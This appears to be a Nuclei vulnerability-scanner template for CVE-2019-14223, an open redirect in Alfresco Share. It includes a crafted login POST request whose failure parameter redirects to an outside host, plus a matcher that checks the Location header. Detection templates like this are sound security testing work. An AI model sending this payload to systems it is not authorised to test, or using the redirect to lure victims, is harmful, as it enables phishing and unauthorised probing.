24 lines
1.1 KiB
YAML
24 lines
1.1 KiB
YAML
id: CVE-2019-14223
|
|
|
|
info:
|
|
name: Alfresco Share Open Redirect
|
|
author: pdteam
|
|
severity: low
|
|
description: An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.).
|
|
reference:
|
|
- https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D
|
|
- https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community
|
|
tags: cve,cve2019,redirect
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- '{{BaseURL}}/share/page/dologin'
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$" |